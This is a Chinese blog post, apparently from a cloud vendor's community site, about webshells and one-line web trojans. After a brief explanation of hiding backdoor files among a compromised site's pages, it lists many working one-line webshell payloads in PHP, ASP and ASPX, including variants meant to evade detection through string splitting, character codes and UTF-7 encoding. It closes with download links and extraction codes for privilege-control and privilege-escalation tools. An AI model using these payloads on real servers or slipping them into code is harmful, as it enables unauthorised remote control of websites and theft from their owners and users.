webshell、小马、权限脚本、权限工具

举报
黑色地带(崛起) 发表于 2023/02/18 12:16:18 2023/02/18
【摘要】 webshell、小马、权限脚本、权限工具

webshell、小马、权限脚本、权限工具

 目录

一、webshell(大马)

1.1、简介:

1.2、缺点:

二、一句话木马(小马)

2.1、简介:

2.2、示例:(来自百度)

三、权限控制脚本下载:

3.1、下载:

四、提权工具

4.1、下载:




一、webshell(大马)

1.1、简介:

是以 asp、aspx、php、jsp 、cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。


渗透进一个网站后,通常会将asp、aspx、php、jsp后门文件与网站web服务器目录下正常的网页文件混在一起

再使用浏览器来访问该后门文件了,得到一个命令执行环境,以达到控制网站服务器的目的

1.2、缺点:

现在各种杀毒软件和防火墙软件都对“大马”有了甄别能力,如果被渗透的web服务器中安装了防御软件,就很难放入大马



二、一句话木马(小马)

2.1、简介:

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。


对于不同的语言有不同的构造方法,基本构造是首先出现的是脚本开始的标记,后边跟着的 eval 或者是 execute 是核心部分,就是获取并执行后边得到的内容,而后边得到的内容,是 request 或者是 $_POST 获取的值。如果我们通过客户端向服务器发送,那么就会让服务器执行我们发送的脚本,挂马就实现了


2.2、示例:(来自百度)

常用一句话木马

asp一句话木马:

<%execute(request("value"))%>


php一句话木马:

<?php @eval($_POST[value]);?>


aspx一句话木马:

<%@ Page Language="Jscript"%>

<%eval(Request.Item["value"])%>


其他一句话木马:

<%eval request("value")%>

<%execute request("value")%>

<%execute(request("value"))%>

<%If Request("value")<>"" Then Execute(Request("value"))%>

<%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>

<SCRIPT language=VBScript runat="server">execute request("value")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["value"],"unsafe");%>


可以躲过雷客图的一句话木马:

<%

set ms = server.CreateObject("MSScriptControl.ScriptControl.1")

ms.Language="VBScript"

ms.AddObject "Response", Response

ms.AddObject "request", request

ms.ExecuteStatement("ev"&"al(request(""value""))")

%>


不用'<,>'的asp一句话木马:

<script language=VBScript runat=server>execute request("value")</script>


不用双引号的一句话木马:

<%eval request(chr(35))%>


UTF-7编码加密:

<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>



三、权限控制脚本下载:

 编辑


3.1、下载:

链接:https://pan.baidu.com/s/10rDy4dUdqcz0vENIeAWUkw?pwd=rpjx 
提取码:rpjx




四、提权工具

 编辑

4.1、下载:

 链接:https://pan.baidu.com/s/1RGgZ3CeByK9adrUYysLPQg?pwd=r6rw 
提取码:r6rw



【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。